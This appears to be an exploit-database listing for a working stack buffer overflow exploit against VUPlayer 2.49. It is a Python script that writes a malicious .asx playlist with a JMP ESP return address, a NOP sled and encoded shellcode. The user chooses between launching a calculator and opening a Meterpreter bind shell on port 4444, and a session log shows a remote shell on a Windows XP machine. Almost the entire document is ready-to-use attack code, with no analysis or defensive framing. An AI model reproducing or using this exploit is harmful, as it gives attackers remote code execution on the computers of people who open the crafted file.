VUPlayer 2.49 Stack Buffer Overflow



EKU-ID: 659 CVE: OSVDB-ID:
Author: neonwarlock Published: 2011-07-04 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#[*] Started bind handler
#[*] Starting the payload handler...
#[*] Sending stage (749056 bytes) to 192.168.164.147
#[*] Meterpreter session 2 opened (192.168.164.141:53820 -> 192.168.164.147:4444) at 2011-07-02 04:08:05 +0530
#
#meterpreter > shell
#Process 2664 created.
#Channel 1 created.
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\Administrator\Desktop>
#

from struct import pack
import os
import sys
en = '''\

|| VUPlayer v2.49 Stack BufferOverflow Exploit (calc/bind) ||
                Author : Zer0 Thunder

------------------------------------------------------------
							 
Select the shellcode you want\n
1. Calculator 
2. Meterpreter BIND Shell 

Enter the Selected Shellcode Number
'''
print en
shell = input(":")
dimbo		= "crash.asx"
header1		= "\x3c\x61\x73\x78\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x22\x33\x2e\x30\x22\x20\x3e\n"
header2n6	= "\x3c\x65\x6e\x74\x72\x79\x3e\n"
header3		= "\x3c\x74\x69\x74\x6c\x65\x3e\x65\x78\x70\x6c\x6f\x69\x74\x2e\x6d\x70\x33\x3c\x2f\x74\x69\x74\x6c\x65\x3e\n"
header4		= "\x3c\x72\x65\x66\x20\x68\x72\x65\x66\x20\x3d"
header5		= "\x22\x20\x2f\x3e\x3c\x65\x6e\x74\x72\x79\x3e"
header7		= "\n\x3c\x2f\x61\x73\x78\x3e"
junk		= "\x41" * 1012
junk2		= pack('<L',0x1010539F) #JMP ESP BASSWMA.dll
nops 		= "\x90" * 20
#Calc.exe

calc= ("\xda\xc1\xd9\x74\x24\xf4\x5a\x4a\x4a\x4a\x4a\x43\x43\x43\x43"
"\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50"
"\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38"
"\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x43\x30\x43\x30"
"\x43\x30\x43\x50\x4b\x39\x4b\x55\x56\x51\x58\x52\x52\x44\x4c"
"\x4b\x50\x52\x56\x50\x4c\x4b\x56\x32\x54\x4c\x4c\x4b\x56\x32"
"\x45\x44\x4c\x4b\x52\x52\x47\x58\x54\x4f\x4e\x57\x50\x4a\x56"
"\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x47\x4c\x45\x31"
"\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54\x4d\x43"
"\x31\x4f\x37\x4d\x32\x5a\x50\x56\x32\x51\x47\x4c\x4b\x56\x32"
"\x54\x50\x4c\x4b\x51\x52\x47\x4c\x43\x31\x4e\x30\x4c\x4b\x47"
"\x30\x54\x38\x4d\x55\x49\x50\x43\x44\x51\x5a\x45\x51\x4e\x30"
"\x56\x30\x4c\x4b\x51\x58\x54\x58\x4c\x4b\x56\x38\x47\x50\x43"
"\x31\x58\x53\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x47\x44\x4c\x4b"
"\x43\x31\x58\x56\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x49"
"\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x47\x48\x4d\x30\x52\x55"
"\x4b\x44\x45\x53\x43\x4d\x5a\x58\x47\x4b\x43\x4d\x47\x54\x52"
"\x55\x5a\x42\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31\x49\x43"
"\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x51\x48\x45\x4c\x45"
"\x51\x58\x53\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x58\x50\x4d\x59"
"\x47\x34\x51\x34\x47\x54\x51\x4b\x51\x4b\x45\x31\x51\x49\x51"
"\x4a\x56\x31\x4b\x4f\x4d\x30\x50\x58\x51\x4f\x51\x4a\x4c\x4b"
"\x45\x42\x5a\x4b\x4c\x46\x51\x4d\x52\x4a\x43\x31\x4c\x4d\x4d"
"\x55\x4e\x59\x43\x30\x45\x50\x45\x50\x56\x30\x52\x48\x56\x51"
"\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x4f"
"\x45\x49\x32\x50\x56\x45\x38\x4f\x56\x5a\x35\x4f\x4d\x4d\x4d"
"\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d\x50\x4b"
"\x4b\x4d\x30\x52\x55\x45\x55\x4f\x4b\x51\x57\x52\x33\x52\x52"
"\x52\x4f\x52\x4a\x43\x30\x56\x33\x4b\x4f\x4e\x35\x45\x33\x45"
"\x31\x52\x4c\x52\x43\x56\x4e\x45\x35\x54\x38\x43\x55\x43\x30"
"\x41\x41")
#meterpreter/bind_tcp LPORT=4444

bind = ("\x89\xe2\xda\xcd\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4c\x49\x43\x30"
"\x43\x30\x43\x30\x43\x50\x4b\x39\x4b\x55\x50\x31\x58\x52\x43"
"\x54\x4c\x4b\x56\x32\x50\x30\x4c\x4b\x51\x42\x54\x4c\x4c\x4b"
"\x51\x42\x45\x44\x4c\x4b\x43\x42\x56\x48\x54\x4f\x58\x37\x51"
"\x5a\x47\x56\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c"
"\x43\x51\x43\x4c\x54\x42\x56\x4c\x51\x30\x49\x51\x58\x4f\x54"
"\x4d\x45\x51\x58\x47\x4b\x52\x4c\x30\x51\x42\x56\x37\x4c\x4b"
"\x51\x42\x52\x30\x4c\x4b\x47\x32\x47\x4c\x43\x31\x58\x50\x4c"
"\x4b\x51\x50\x54\x38\x4c\x45\x4f\x30\x52\x54\x51\x5a\x43\x31"
"\x4e\x30\x56\x30\x4c\x4b\x51\x58\x52\x38\x4c\x4b\x56\x38\x47"
"\x50\x43\x31\x58\x53\x4b\x53\x47\x4c\x51\x59\x4c\x4b\x56\x54"
"\x4c\x4b\x43\x31\x49\x46\x56\x51\x4b\x4f\x50\x31\x4f\x30\x4e"
"\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x4f\x37\x56\x58\x4b\x50"
"\x54\x35\x4b\x44\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x47"
"\x54\x43\x45\x5a\x42\x50\x58\x4c\x4b\x50\x58\x56\x44\x45\x51"
"\x58\x53\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x43\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x58\x50"
"\x4c\x49\x47\x34\x51\x34\x51\x34\x51\x4b\x51\x4b\x43\x51\x50"
"\x59\x50\x5a\x50\x51\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x51\x4a"
"\x4c\x4b\x52\x32\x5a\x4b\x4c\x46\x51\x4d\x43\x58\x56\x53\x47"
"\x42\x45\x50\x45\x50\x45\x38\x52\x57\x43\x43\x50\x32\x51\x4f"
"\x56\x34\x45\x38\x50\x4c\x52\x57\x47\x56\x43\x37\x4b\x4f\x49"
"\x45\x4f\x48\x4c\x50\x45\x51\x43\x30\x45\x50\x56\x49\x58\x44"
"\x50\x54\x50\x50\x52\x48\x51\x39\x4b\x30\x52\x4b\x43\x30\x4b"
"\x4f\x58\x55\x50\x50\x50\x50\x50\x50\x56\x30\x51\x50\x50\x50"
"\x51\x50\x56\x30\x52\x48\x4b\x5a\x54\x4f\x49\x4f\x4b\x50\x4b"
"\x4f\x58\x55\x4c\x57\x50\x31\x49\x4b\x56\x33\x43\x58\x43\x32"
"\x45\x50\x54\x51\x51\x4c\x4c\x49\x4d\x36\x43\x5a\x52\x30\x50"
"\x56\x50\x57\x52\x48\x49\x52\x49\x4b\x50\x37\x43\x57\x4b\x4f"
"\x58\x55\x56\x33\x51\x47\x43\x58\x58\x37\x4d\x39\x56\x58\x4b"
"\x4f\x4b\x4f\x49\x45\x50\x53\x56\x33\x50\x57\x45\x38\x43\x44"
"\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x51\x47\x4c\x57\x45"
"\x38\x54\x35\x52\x4e\x50\x4d\x45\x31\x4b\x4f\x49\x45\x52\x4a"
"\x43\x30\x43\x5a\x54\x44\x51\x46\x51\x47\x52\x48\x45\x52\x4e"
"\x39\x4f\x38\x51\x4f\x4b\x4f\x58\x55\x4c\x4b\x50\x36\x52\x4a"
"\x51\x50\x52\x48\x43\x30\x54\x50\x43\x30\x45\x50\x56\x36\x43"
"\x5a\x45\x50\x43\x58\x56\x38\x4f\x54\x51\x43\x4b\x55\x4b\x4f"
"\x58\x55\x4c\x53\x50\x53\x43\x5a\x43\x30\x56\x36\x50\x53\x51"
"\x47\x52\x48\x43\x32\x4e\x39\x58\x48\x51\x4f\x4b\x4f\x49\x45"
"\x43\x31\x49\x53\x51\x39\x4f\x36\x4d\x55\x4b\x46\x54\x35\x5a"
"\x4c\x4f\x33\x41\x41")

if shell == 1:
	print "You Have Selected Calculator\n"
	junk3 	= "\x43" * (2000-len(header1+header2n6+header3+header4+junk+junk2+nops+calc+header5+header7))
	payload 	= header1+header2n6+header3+header4+junk+junk2+nops+calc+junk3+header5+header7
elif shell == 2:
	print "You Have Selected BIND Shell\n"
	junk3 	= "\x43" * (2000-len(header1+header2n6+header3+header4+junk+junk2+nops+bind+header5+header7))
	payload 	= header1+header2n6+header3+header4+junk+junk2+nops+bind+junk3+header5+header7
else:
	print "Wrong input"


print "Have Fun !!! "
file = open(dimbo , 'w')
file.write(payload)
file.close()

#E-mail - neonwarlock@live.com
#Site/Blog - http://blog.zt-security.com/
# Sri Lankan Hackers